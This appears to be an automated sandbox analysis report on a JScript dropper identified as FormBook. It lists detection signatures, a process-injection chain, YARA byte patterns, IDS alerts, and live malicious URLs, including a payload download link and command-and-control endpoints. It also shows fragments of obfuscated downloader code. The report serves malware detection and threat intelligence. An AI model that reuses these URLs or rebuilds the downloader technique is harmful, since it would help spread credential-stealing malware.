Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0900664 MOHS Tender..js

Overview

General Information

Sample Name:0900664 MOHS Tender..js
Analysis ID:794330
MD5:a83afa6f04c636145ba81c1ae4fb0b09
SHA1:a229f1ae98501e9fb00097986b3e76a910c97903
SHA256:15232283ec281be6d000c6f5286007413363ec3fcb108642e49791a953540de1
Tags:js
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
JScript performs obfuscated calls to suspicious functions
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Deletes itself after installation
Potential obfuscated javascript found
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Uses ipconfig to lookup or modify the Windows network settings
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Connects to several IPs in different countries
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1252 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0900664 MOHS Tender..js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • winner.exe (PID: 3276 cmdline: "C:\Users\user\AppData\Local\Temp\winner.exe" MD5: A9C03263C6DD4A1B672955A5ECADC1FF)
      • CasPol.exe (PID: 5212 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
        • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • ipconfig.exe (PID: 4984 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x20e23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xcc42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x19e68:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x19904:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x19f6a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1a0e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xc80d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x18b4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1fbca:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x20b7d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f030:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18277:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20e23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcc42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.CasPol.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19e68:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19904:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19f6a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a0e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc80d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18b4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fbca:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20b7d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.CasPol.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.CasPol.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20023:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbe42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.514.128.47.12649707802031412 01/30/23-13:39:50.282718
          SID:2031412
          Source Port:49707
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.514.128.47.12649743802031449 01/30/23-13:42:32.091612
          SID:2031449
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.514.128.47.12649707802031449 01/30/23-13:39:50.282718
          SID:2031449
          Source Port:49707
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5208.91.197.9149712802031449 01/30/23-13:40:11.394536
          SID:2031449
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.514.128.47.12649743802031412 01/30/23-13:42:32.091612
          SID:2031412
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.523.227.38.7449720802031412 01/30/23-13:40:51.433517
          SID:2031412
          Source Port:49720
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5199.192.28.12149724802031453 01/30/23-13:41:08.676759
          SID:2031453
          Source Port:49724
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.514.128.47.12649707802031453 01/30/23-13:39:50.282718
          SID:2031453
          Source Port:49707
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.523.227.38.7449720802031453 01/30/23-13:40:51.433517
          SID:2031453
          Source Port:49720
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5199.192.28.12149724802031449 01/30/23-13:41:08.676759
          SID:2031449
          Source Port:49724
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.587.236.16.15349742802031449 01/30/23-13:42:25.723154
          SID:2031449
          Source Port:49742
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.523.227.38.7449720802031449 01/30/23-13:40:51.433517
          SID:2031449
          Source Port:49720
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5199.192.28.12149724802031412 01/30/23-13:41:08.676759
          SID:2031412
          Source Port:49724
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.514.128.47.12649743802031453 01/30/23-13:42:32.091612
          SID:2031453
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5208.91.197.9149712802031412 01/30/23-13:40:11.394536
          SID:2031412
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.566.96.162.14949715802031449 01/30/23-13:40:21.675069
          SID:2031449
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.587.236.16.15349742802031412 01/30/23-13:42:25.723154
          SID:2031412
          Source Port:49742
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.566.96.162.14949715802031412 01/30/23-13:40:21.675069
          SID:2031412
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5208.91.197.9149712802031453 01/30/23-13:40:11.394536
          SID:2031453
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.566.96.162.14949715802031453 01/30/23-13:40:21.675069
          SID:2031453
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.587.236.16.15349742802031453 01/30/23-13:42:25.723154
          SID:2031453
          Source Port:49742
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: 0900664 MOHS Tender..jsReversingLabs: Detection: 17%
          Source: 0900664 MOHS Tender..jsVirustotal: Detection: 27%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.chimid.org/czni/Avira URL Cloud: Label: malware
          Source: http://www.laylaroseuk.comAvira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/czni/Avira URL Cloud: Label: malware
          Source: http://www.44yyds.com/czni/Avira URL Cloud: Label: malware
          Source: http://www.yeah-go.com/czni/Avira URL Cloud: Label: malware
          Source: http://www.frogair.onlineAvira URL Cloud: Label: malware
          Source: http://www.frogair.online/czni/Avira URL Cloud: Label: malware
          Source: http://www.laylaroseuk.com/czni/Avira URL Cloud: Label: malware
          Source: https://hirosguide.hu/ti/winner.exeAvira URL Cloud: Label: malware
          Source: http://www.laylaroseuk.com/czni/?20=4xfPiv3RnE&z8rul-n=CEJ5RAslKFrvYswGKkWFaMEg5PbGdI0uMfwhN2QDDZMYEZrXiZBgo1mjS41e+07AKrnAHTFcuEyQDmPBY1Lnrpc7hFsEfyPzNg==Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloudAvira URL Cloud: Label: phishing
          Source: http://www.yeah-go.com/czni/?z8rul-n=NBbLbMKCnleo0bnLNJr7y57f08wHeLbsflpVfs6UmX5SvZLxN88Gw8EeREzrIsvGXit/2Ohq43fDpUBAiFCfWP8z8U1D0vMs/Q==&20=4xfPiv3RnEAvira URL Cloud: Label: malware
          Source: http://www.44yyds.com/czni/?20=4xfPiv3RnE&z8rul-n=DD3LLnJbgjRI3wbnkxRSCI8A3gaHykSHoexTe78K7+O1bJpnCKZS4RFcfu7PoQdaWmtTlOOE5dVeManAz6l5Ezu0dt1GwRw+Ew==Avira URL Cloud: Label: malware
          Source: http://www.frogair.online/czni/?20=4xfPiv3RnE&z8rul-n=5oRHUQDtYJ3jH+KiyYuXif0R6NF655imjfvnRa6lV5c+zSwVFD4ch3jkTam3ow4RLLhVoDNP5tCGnm9XMNb3kyjT9rM2PcJgOg==Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\winner[1].exeReversingLabs: Detection: 34%
          Source: C:\Users\user\AppData\Local\Temp\winner.exeReversingLabs: Detection: 34%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\winner[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\winner.exeJoe Sandbox ML: detected
          Source: 2.2.CasPol.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: unknownHTTPS traffic detected: 91.227.138.48:443 -> 192.168.2.5:49703 version: TLS 1.2
          Source: Binary string: ipconfig.pdb source: CasPol.exe, 00000002.00000002.451827142.0000000001650000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: CasPol.exe, 00000002.00000002.451827142.0000000001650000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.414244816.000000000106E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.412098136.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.414244816.000000000106E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.412098136.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_007631E0 FindFirstFileW,FindNextFileW,FindClose,6_2_007631E0

          Software Vulnerabilities

          barindex
          JavaScript source code contains functionality to generate code involving a shell, file or stream
          Source: 0900664 MOHS Tender..jsReturn value : ['3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"ADODB.Stream"']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', '"ADODB.Stream"']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', '"SaveToFile"', '"ADODB.Stream"']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', '"SaveToFile"', '"ADODB.Stream"']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', '"SaveToFile"', '"ADODB.Stream"', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', '"ADODB.Stream"', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', '"ADODB.Stream"', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
